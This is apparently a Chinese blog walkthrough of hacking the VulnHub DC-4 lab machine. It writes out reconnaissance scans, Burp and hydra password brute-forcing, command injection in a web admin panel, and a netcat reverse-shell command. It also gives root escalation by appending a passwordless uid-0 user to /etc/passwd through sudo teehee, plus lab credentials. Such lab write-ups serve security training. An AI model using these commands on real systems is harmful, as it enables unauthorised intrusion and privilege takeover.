DC系列——DC4靶机渗透测试

admin 2024年1月15日16:17:55评论32 views字数 3165阅读10分33秒阅读模式
DC系列——DC4靶机渗透测试

现在只对常读和星标的公众号才展示大图推送,建议大家能把GG安全“设为星标”,否则可能就看不到了啦!

DC系列——DC4靶机渗透测试

免责声明

本文章仅用于分享信息安全防御技术,请遵守中华人民共和国相关法律法规,禁止进行任何违法犯罪行为。作者不承担因他人滥用本文所导致的任何法律责任。

本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失,GG安全公众号和原文章作者不承担任何责任。如果出现任何后果,请使用者自行承担。如果有侵权行为,请告知我们,我们将立即删除并致以道歉。谢谢!

知识先导

GG安全

vulnhub靶场地址:www.vulnhub.com

DC系列简介:DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。

前期准备

1、下载靶场

靶机名称:DC-4(包含1个flag

下载地址:

https://www.vulnhub.com/entry/dc-4,313/

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

DC系列——DC4靶机渗透测试

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 DC-2 login 时表示安装成功)。

前提:DC-4和kali在同一网段 

已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

已知DC-2所在的网段

—— DC-4 IP地址:192.168.130.134/24

信息收集

信息收集

获取DC42的IP地址

命令:

netdiscover -r 192.168.108.0/24

DC系列——DC4靶机渗透测试

由图可知DC-4的IP地址是:192.168.108.134/24
端口扫描命令:
nmap -sV -p- 192.168.108.134//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描

获取信息如下:

端口号

服务

版本

22

ssh

7.4p1

80

http

nginx 1.15.10

渗透测试

修改kali的host文件(文件所在地址为:/etc/hosts)

补充:

DC系列——DC4靶机渗透测试
vim /etc/hosts #编辑host文件(添加192.168.108.131 dc-2)cat /etc/hosts #查看host文件(修改之后进行查看)

DC系列——DC4靶机渗透测试

访问80端口,并重新识别CMS

DC系列——DC4靶机渗透测试

发现是一个登录框,可以输入账号密码,继续对其进行CMS的识别

CMS识别(使用工具CMSeek):
python3 cmseek.py -u http://dc-4/

DC系列——DC4靶机渗透测试

进行目录描扫,看看能不能拿到后台登陆的地址(实用工具dirb):

dirb http://dc-4

DC系列——DC4靶机渗透测试

 扫描URL:

http://dc-4/

扫描结果:

http://dc-4/css/

http://dc-4/images/

http://dc-4/index.php

这个结果证明有一个images的目录,看名字应该是存放图片的地方,后期有漏洞的话也可以尝试挂马试试
通过 msf 和 searchsploit 去查询是否有可以直接利用的漏洞信息

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

在使用searchsploit(kali自带的漏洞库)的时候发现了两个可以用户枚举的漏洞信息,查看并尝试使用看看能不能获取到ssh的用户信息

searchsploit -x linux/remote/45233.py 

看了一下是一个python脚本,去脚本中给出的地址下载下来了,一看有很多依赖,没整太明白,还是先用burp抓包看一下

获取shell

DC系列——DC4靶机渗透测试

设置变量1(账号)

DC系列——DC4靶机渗透测试

设置变量2(密码)

DC系列——DC4靶机渗透测试

查看请求数据包之后发现好像也没有进行cookie等的验证,那就直接爆破一下账号密码吧

DC系列——DC4靶机渗透测试

爆破结果(对返回数据包的长度进行筛选,得到正确的账号密码:admin、happy)

DC系列——DC4靶机渗透测试

在登陆页面尝试登录,登陆成功

DC系列——DC4靶机渗透测试

为了方便阅读,这里点完commend之后翻译一下这三个选项

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

可以看到执行了ls -l之后获取到了当前位置下的目录,这里猜测可以执行命令会不会是有一些敏感数据的传输,使用burp抓包看一下
burp抓包之后很惊喜,查看到在请求数据包内直接是对命令进行明文传输的,尝试对其进行修改看看能不能执行其他的命令

DC系列——DC4靶机渗透测试

发现可以进行命令执行 
ip add #查看靶机的IP地址
DC系列——DC4靶机渗透测试
尝试获取shell,进行反弹:
nc -e /bin/sh 192.168.108.129 6868

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

提权

由于 DC-4 还是只存在一个flag,所以这里不用想了还是需要进行提权,继续收集信息

DC系列——DC4靶机渗透测试

系统信息:
Linux 4.9.0-3-686 
Debian 4.9.30-2 
老套路了,改善一下shell交互的环境
python -c "import pty;pty.spawn('/bin/bash')"

DC系列——DC4靶机渗透测试

进入家目录,查看发现存在了三个用户的家目录

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

可以明显看到在名为jim的用户文件夹里面有不一样的文件(重点查看)

DC系列——DC4靶机渗透测试

很惊喜,居然看见了一个old-passwords.bak的文件,这很可能就是一个密码的备份文件

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

查看之后就是一个密码本(字典),并且包含了252个密码,可以尝试对ssh进行爆破了

使用九头蛇进行ssh的暴力破解
hydra -l jim -P old-passwd.txt ssh://dc-4 -v -f -e nr -t 4 # 为了加快我后期使用的是64线程

参数:

-l user

login  小写,指定用户名进行破解

-L file

大写,指定用户的用户名字典

-p pass

小写,用于指定密码破解,很少使用,一般采用密码字典

-P file

大写,用于指定密码字典

-v / -V

显示详细过程

-f

找到第一对登录名或者密码的时候中止破解。

-e nsr

nsr  额外的选项,n:空密码试探,s:使用指定账户和密码试探,r:密码是用户名的反写

-t 数字

tasks  同时运行的线程数,默认是16

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

成功得到了ssh

[22][ssh]

host:  dc-4  

login:  jim  

password:  jibril04

su - 切换到jim账户去查看mbox文件

DC系列——DC4靶机渗透测试

在这个文件中我们可以得知,root给jim发送了一封邮件,继续去linux存放邮件的目录下找一下有没有这个邮件
注:linux系统收到邮件都会保存在“/var/spool/mail/[linux用户名]”文件中

DC系列——DC4靶机渗透测试

注意这次切换用户的时候用户名需要改成小写

DC系列——DC4靶机渗透测试

在这里不小心退出去了,所以直接使用charles、^xHhA&hvim0y直接ssh登录了

DC系列——DC4靶机渗透测试

DC系列——DC4靶机渗透测试

注意:teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
直接进行提权
原理:核心思路就是利用其在passwd文件中追加一条uid为0(root uit=0)的用户条目
使用:echo "hahaha888::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
解释:按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su hahaha888就可以登录到hahaha888用户,这个用户因为uid为0,所以也是root权限
可以看到在执行完指令之后直接变为了root(超户),提权成功

DC系列——DC4靶机渗透测试

获取flag

成功在/root/目录下拿到flag

DC系列——DC4靶机渗透测试

猎杀时刻

    目前在GG安全公众号中回复关键字"CISP-PTE",即可获得CISP-PTE靶机打包套件。再次声明:本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失,GG安全公众号和原文章作者不承担任何责任。

DC系列——DC4靶机渗透测试

    为了方便师傅们的交流学习,根据广大师傅们的建议,我在之后也会考虑创建一个的群聊。预计在内部群内,我们将分享一些脱敏的漏洞报告和渗透测试实战案例,还将会有一些经验丰富的大牛和巨佬分享他们的经验。后续还将提供一些福利,例如送书和小礼物等等。欢迎师傅们到时候加入群聊,一起交流学习,致力打造一个有丰富学习氛围的小圈子。

DC系列——DC4靶机渗透测试

原文始发于微信公众号(GG安全):DC系列——DC4靶机渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月15日16:17:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC系列——DC4靶机渗透测试http://cn-sec.com/archives/2217723.html

发表评论

匿名网友 填写信息